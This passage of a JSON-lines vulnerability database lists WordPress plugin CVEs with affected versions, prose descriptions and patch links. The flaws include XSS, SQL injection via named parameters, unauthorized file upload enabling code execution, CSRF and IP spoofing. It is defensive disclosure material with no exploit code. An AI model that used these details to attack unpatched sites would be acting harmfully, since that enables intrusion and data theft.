version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a86f6ed-9755-4265-bc0d-2d0e18e9982f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a86f6ed-9755-4265-bc0d-2d0e18e9982f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3021494\\\/ai-engine\\\/trunk\\\/classes\\\/core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3021494\\\/ai-engine\\\/trunk\\\/classes\\\/core.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13801","slug":"bwl-advanced-faq-manager","versionImpact":"2.1.4","versionEndExcluding":"2.1.5","description":"The BWL Advanced FAQ Manager plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the 'baf_set_notice_status' AJAX action in all versions up to, and including, 2.1.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update option values to '1' on the WordPress site. This can be leveraged to update an option that would create an error on the site and deny service to legitimate users or be used to set some values to true such as registration.","recommendation":"Update to version 2.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/bwl-advanced-faq-manager\\\/5007135\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/bwl-advanced-faq-manager\\\/5007135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3a84201-6cd8-4528-ae7a-7fd813c8da18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3a84201-6cd8-4528-ae7a-7fd813c8da18?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1332","slug":"custom-fonts","versionImpact":"2.1.4","versionEndExcluding":"2.1.5","description":"The Custom Fonts \u2013 Host Your Fonts Locally plugin for WordPress is vulnerable to Stored Cross-Site Scripting via svg file upload in all versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author level or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98536242-64c7-4e02-aa00-a3efbf5c90d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98536242-64c7-4e02-aa00-a3efbf5c90d8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3074871%40custom-fonts%2Ftrunk&old=3062686%40custom-fonts%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3074871%40custom-fonts%2Ftrunk&old=3062686%40custom-fonts%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-56245","slug":"premium-blocks-for-gutenberg","versionImpact":"2.1.42","versionEndExcluding":"2.1.43","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Leap13 Premium Blocks \u2013 Gutenberg Blocks for WordPress allows Stored XSS.This issue affects Premium Blocks \u2013 Gutenberg Blocks for WordPress: from n\/a through 2.1.42.","recommendation":"Update to version 2.1.43, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/premium-blocks-for-gutenberg\\\/vulnerability\\\/wordpress-premium-blocks-plugin-2-1-42-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/premium-blocks-for-gutenberg\\\/vulnerability\\\/wordpress-premium-blocks-plugin-2-1-42-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4716","slug":"wp-popups-lite","versionEndExcluding":"2.1.4.8","description":"The WP Popups WordPress plugin before 2.1.4.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/24176ad3-2317-4853-b4db-8394384d52cd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/24176ad3-2317-4853-b4db-8394384d52cd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11331","slug":"isee-products-extractor","versionImpact":"2.1.3","versionEndExcluding":"2.1.4","description":"The ??????? ??????? ??????? ???? ???? plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/isee-products-extractor\\\/tags\\\/2.1.2\\\/admin\\\/pages\\\/products_list.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/isee-products-extractor\\\/tags\\\/2.1.2\\\/admin\\\/pages\\\/products_list.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/isee-products-extractor\\\/tags\\\/2.1.2\\\/admin\\\/pages\\\/products_list.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/isee-products-extractor\\\/tags\\\/2.1.2\\\/admin\\\/pages\\\/products_list.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/isee-products-extractor\\\/tags\\\/2.1.2\\\/admin\\\/pages\\\/products_list.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/isee-products-extractor\\\/tags\\\/2.1.2\\\/admin\\\/pages\\\/products_list.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af0cc02a-b6dd-4058-b686-9c9a3a4a5962?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af0cc02a-b6dd-4058-b686-9c9a3a4a5962?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12617","slug":"wc-price-history","versionImpact":"2.1.3","versionEndExcluding":"2.1.4","description":"The WC Price History for Omnibus plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several AJAX actions in all versions up to, and including, 2.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view and modify history data.","recommendation":"Update to version 2.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209687%40wc-price-history&new=3209687%40wc-price-history&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209687%40wc-price-history&new=3209687%40wc-price-history&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b380b053-9847-48a8-ba12-d07db9df2baf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b380b053-9847-48a8-ba12-d07db9df2baf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4300","slug":"import-xml-feed","versionEndExcluding":"2.1.4","description":"The Import XML and RSS Feeds WordPress plugin before 2.1.4 does not filter file extensions for uploaded files, allowing an attacker to upload a malicious PHP file, leading to Remote Code Execution.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4220025-2272-4d5f-9703-4b2ac4a51c42\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4220025-2272-4d5f-9703-4b2ac4a51c42\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4826","slug":"simple-tooltips","versionEndExcluding":"2.1.4","description":"The Simple Tooltips WordPress plugin before 2.1.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59fa32d2-aa66-4980-9ee5-0a7513f3a2b0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59fa32d2-aa66-4980-9ee5-0a7513f3a2b0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4374","slug":"dethemekit-for-elementor","versionImpact":"2.1.3","versionEndExcluding":"2.1.4","description":"The DethemeKit For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcd9384c-5af3-4544-8179-c2f5550dd152?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcd9384c-5af3-4544-8179-c2f5550dd152?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3088000%40dethemekit-for-elementor&new=3088000%40dethemekit-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3088000%40dethemekit-for-elementor&new=3088000%40dethemekit-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0501","slug":"wp-insurance","versionEndExcluding":"2.1.4","description":"The WP Insurance WordPress plugin before 2.1.4 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36fd6c0d-3f0c-4f7d-aa17-5b2d084ab94c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36fd6c0d-3f0c-4f7d-aa17-5b2d084ab94c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2111","slug":"holler-box","versionEndExcluding":"2.1.4","description":"The Fast & Effective Popups & Lead-Generation for WordPress plugin before 2.1.4 concatenates user input into an SQL query without escaping it first in the plugin's report API endpoint, which could allow administrators in multi-site configuration to leak sensitive information from the site's database.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a0bdd47-c339-489d-9443-f173a83447f2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a0bdd47-c339-489d-9443-f173a83447f2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13799","slug":"user-private-files","versionImpact":"2.1.3","versionEndExcluding":"2.1.4","description":"The User Private Files \u2013 File Upload & Download Manager with Secure File Sharing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018new-fldr-name\u2019 parameter in all versions up to, and including, 2.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-private-files\\\/trunk\\\/js\\\/folder.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-private-files\\\/trunk\\\/js\\\/folder.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240877\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240877\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/419cf912-3187-43d7-90ab-1a20a46d86e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/419cf912-3187-43d7-90ab-1a20a46d86e4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-47368","slug":"premium-blocks-for-gutenberg","versionImpact":"2.1.33","versionEndExcluding":"2.1.34","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Leap13 Premium Blocks \u2013 Gutenberg Blocks for WordPress allows Stored XSS.This issue affects Premium Blocks \u2013 Gutenberg Blocks for WordPress: from n\/a through 2.1.33.","recommendation":"Update to version 2.1.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/premium-blocks-for-gutenberg\\\/wordpress-premium-blocks-plugin-2-1-33-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/premium-blocks-for-gutenberg\\\/wordpress-premium-blocks-plugin-2-1-33-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3430","slug":"3dprint-lite","versionImpact":"2.1.3.6","versionEndExcluding":"2.1.3.7","description":"The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'printer_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/718f5cf2-ca83-4981-9123-4360d043a32d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/718f5cf2-ca83-4981-9123-4360d043a32d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3429","slug":"3dprint-lite","versionImpact":"2.1.3.6","versionEndExcluding":"2.1.3.7","description":"The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'material_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cf26716-70b6-4e5e-9ac1-764060be2215?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cf26716-70b6-4e5e-9ac1-764060be2215?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3428","slug":"3dprint-lite","versionImpact":"2.1.3.6","versionEndExcluding":"2.1.3.7","description":"The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'coating_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaac2a61-7be6-4936-82a0-21c3665fa436?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaac2a61-7be6-4936-82a0-21c3665fa436?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3427","slug":"3dprint-lite","versionImpact":"2.1.3.6","versionEndExcluding":"2.1.3.7","description":"The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'infill_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/156945e1-80dc-4fb4-958f-bb87722e96fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/156945e1-80dc-4fb4-958f-bb87722e96fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10879","slug":"forumwp","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The ForumWP \u2013 Forum & Discussion Board plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/tags\\\/2.1.0\\\/includes\\\/admin\\\/class-emails-list-table.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/tags\\\/2.1.0\\\/includes\\\/admin\\\/class-emails-list-table.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/tags\\\/2.1.0\\\/includes\\\/admin\\\/class-emails-list-table.php#L178\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/tags\\\/2.1.0\\\/includes\\\/admin\\\/class-emails-list-table.php#L178\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b3256b-5271-44b8-ab4d-05156d4f674b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b3256b-5271-44b8-ab4d-05156d4f674b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4539","slug":"web-application-firewall","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The Web Application Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.1.2. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e99531c-8742-4f91-8525-65bb3cb06644?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e99531c-8742-4f91-8525-65bb3cb06644?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3055548\\\/web-application-firewall\\\/trunk\\\/helper\\\/utility.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3055548\\\/web-application-firewall\\\/trunk\\\/helper\\\/utility.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0749","slug":"ocean-extra","versionEndExcluding":"2.1.3","description":"The Ocean Extra WordPress plugin before 2.1.3 does not ensure that the template to be loaded via a shortcode is actually a template, allowing any authenticated users such as subscriber to retrieve the content of arbitrary posts, such as draft, private or even password protected ones.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9caa8d2e-383b-47d7-8d21-d2ed6b1664cb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9caa8d2e-383b-47d7-8d21-d2ed6b1664cb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8538","slug":"tuxedo-big-file-uploads","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The Big File Uploads \u2013 Increase Maximum File Upload Size plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.1.2. This is due the plugin not sanitizing a file path in an error message. This makes it possible for authenticated attackers, with author-level access and above, to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd308a4-7157-4bc6-a55b-c6a4a62510a9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd308a4-7157-4bc6-a55b-c6a4a62510a9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/uglyrobot\\\/big-file-uploads\\\/blob\\\/master\\\/tuxedo_big_file_uploads.php#L601\",\"name\":\"https:\\\/\\\/github.com\\\/uglyrobot\\\/big-file-uploads\\\/blob\\\/master\\\/tuxedo_big_file_uploads.php#L601\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147755\\\/tuxedo-big-file-uploads\\\/trunk\\\/tuxedo_big_file_uploads.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147755\\\/tuxedo-big-file-uploads\\\/trunk\\\/tuxedo_big_file_uploads.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4313","slug":"table-addons-for-elementor","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The Table Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_id\u2019 parameter in all versions up to, and including, 2.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddbb4bcf-daf7-4ae3-8f42-fce5f1d2c279?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddbb4bcf-daf7-4ae3-8f42-fce5f1d2c279?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/table-addons-for-elementor\\\/trunk\\\/includes\\\/class-table-addons-for-elementor-widget.php#L637\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/table-addons-for-elementor\\\/trunk\\\/includes\\\/class-table-addons-for-elementor-widget.php#L637\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3104753%40table-addons-for-elementor&new=3104753%40table-addons-for-elementor&sfp_email=&sfph_mail=#file57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3104753%40table-addons-for-elementor&new=3104753%40table-addons-for-elementor&sfp_email=&sfph_mail=#file57\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12163","slug":"goodlayers-core","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The goodlayers-core WordPress plugin before 2.1.3 allows users with a subscriber role and above to upload SVGs containing malicious payloads.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea704054-fb66-4014-89bd-1c61074f64e5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea704054-fb66-4014-89bd-1c61074f64e5\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea704054-fb66-4014-89bd-1c61074f64e5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea704054-fb66-4014-89bd-1c61074f64e5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7855","slug":"wp-hotel-booking","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The WP Hotel Booking plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the update_review() function in all versions up to, and including, 2.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/784593ec-b635-4f59-9afb-ab506f786d21?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/784593ec-b635-4f59-9afb-ab506f786d21?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hotel-booking\\\/trunk\\\/includes\\\/class-wphb-comments.php#L150\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hotel-booking\\\/trunk\\\/includes\\\/class-wphb-comments.php#L150\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3157905%40wp-hotel-booking&new=3157905%40wp-hotel-booking&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3157905%40wp-hotel-booking&new=3157905%40wp-hotel-booking&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
